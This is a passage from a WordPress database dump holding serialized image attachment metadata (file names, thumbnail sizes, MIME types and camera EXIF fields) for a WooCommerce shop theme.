-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product6-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product6-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product6-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product6-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product6-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product6-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product6-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product6-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(934,3266,'_wp_attachment_image_alt','o'),(935,1183,'_wp_attachment_image_alt','a'),(936,1184,'_wp_attachment_image_alt','a'),(937,3274,'_wp_attached_file','2018/02/pricing-img-8.png'),(938,3274,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:93;s:6:\"height\";i:177;s:4:\"file\";s:25:\"2018/02/pricing-img-8.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"pricing-img-8-93x100.png\";s:5:\"width\";i:93;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"pricing-img-8-93x150.png\";s:5:\"width\";i:93;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"pricing-img-8-93x100.png\";s:5:\"width\";i:93;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(939,3274,'_wp_attachment_image_alt','a'),(940,1187,'_wp_attached_file','2018/01/product7-gallery1.jpg'),(941,3275,'_wp_attached_file','2018/02/h3-slide3-graphic1.jpg'),(942,1187,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product7-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product7-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product7-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product7-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product7-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product7-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product7-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product7-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product7-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product7-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product7-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product7-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(943,3275,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:393;s:4:\"file\";s:30:\"2018/02/h3-slide3-graphic1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h3-slide3-graphic1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-600x123.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"h3-slide3-graphic1-300x61.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:61;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic1-1024x210.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-768x157.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic1-1536x314.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:314;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-550x393.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:393;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic1-1100x393.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:393;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-550x393.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:393;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic1-1100x393.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:393;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h3-slide3-graphic1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-600x123.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(944,1552,'_wp_attachment_image_alt','z'),(945,3512,'_wp_attachment_image_alt','o'),(946,3513,'_wp_attachment_image_alt','a'),(947,4244,'_wp_attachment_image_alt','a'),(948,1553,'_wp_attached_file','2018/01/h7-img-9.jpg'),(949,1553,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:662;s:4:\"file\";s:20:\"2018/01/h7-img-9.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h7-img-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h7-img-9-272x300.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h7-img-9-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h7-img-9-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h7-img-9-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h7-img-9-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h7-img-9-550x662.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:662;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h7-img-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(950,3514,'_wp_attached_file','2018/02/landing-contact-us.jpg'),(951,3514,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:462;s:4:\"file\";s:30:\"2018/02/landing-contact-us.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"landing-contact-us-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-contact-us-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"landing-contact-us-600x347.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:347;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"landing-contact-us-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-contact-us-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"landing-contact-us-768x444.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:444;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"landing-contact-us-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"landing-contact-us-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"landing-contact-us-550x462.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"landing-contact-us-550x462.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"landing-contact-us-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"landing-contact-us-600x347.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:347;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-contact-us-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(952,2176,'_wp_attachment_image_alt','a'),(953,2177,'_wp_attachment_image_alt','a'),(954,2200,'_wp_attached_file','2018/02/h1-img-1.png'),(955,2200,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:167;s:6:\"height\";i:194;s:4:\"file\";s:20:\"2018/02/h1-img-1.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(956,2177,'_wp_attachment_image_alt','a'),(957,2200,'_wp_attachment_image_alt','O'),(958,2200,'_wp_attachment_image_alt','O'),(959,4240,'_wp_attachment_image_alt','o'),(960,905,'_wp_attachment_image_alt','o'),(961,906,'_wp_attachment_image_alt','a'),(962,1184,'_wp_attachment_image_alt','a'),(963,1187,'_wp_attachment_image_alt','a'),(964,2201,'_wp_attached_file','2018/02/h1-img-2.png'),(965,2201,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:141;s:6:\"height\";i:194;s:4:\"file\";s:20:\"2018/02/h1-img-2.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-2-141x150.png\";s:5:\"width\";i:141;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(966,4245,'_wp_attached_file','2018/02/h1-img-2-1.png'),(967,4245,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:141;s:6:\"height\";i:194;s:4:\"file\";s:22:\"2018/02/h1-img-2-1.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"h1-img-2-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"h1-img-2-1-141x150.png\";s:5:\"width\";i:141;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"h1-img-2-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(968,912,'_wp_attached_file','2018/01/yoga-small-for-NW.jpg'),(969,912,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:867;s:4:\"file\";s:29:\"2018/01/yoga-small-for-NW.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"yoga-small-for-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"yoga-small-for-NW-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"yoga-small-for-NW-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"yoga-small-for-NW-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"yoga-small-for-NW-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"yoga-small-for-NW-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"yoga-small-for-NW-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"yoga-small-for-NW-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"yoga-small-for-NW-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"yoga-small-for-NW-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"yoga-small-for-NW-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"yoga-small-for-NW-550x867.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"yoga-small-for-NW-1100x867.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"yoga-small-for-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"yoga-small-for-NW-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"yoga-small-for-NW-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1426773074\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"28\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(970,2201,'_wp_attachment_image_alt','o'),(971,3513,'_wp_attachment_image_alt','a'),(972,3514,'_wp_attachment_image_alt','a'),(973,4245,'_wp_attachment_image_alt','o'),(974,1188,'_wp_attached_file','2018/01/product7-gallery2.jpg'),(975,1188,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product7-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product7-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product7-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product7-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product7-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product7-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product7-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product7-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product7-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product7-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product7-gallery2-